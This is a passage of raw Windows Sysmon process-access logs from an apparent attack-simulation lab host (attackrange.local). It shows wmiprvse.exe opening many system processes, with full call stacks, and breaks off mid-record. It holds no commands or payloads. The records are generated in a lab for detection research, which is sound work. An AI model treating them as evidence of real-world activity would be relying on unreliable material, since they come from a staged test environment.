15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 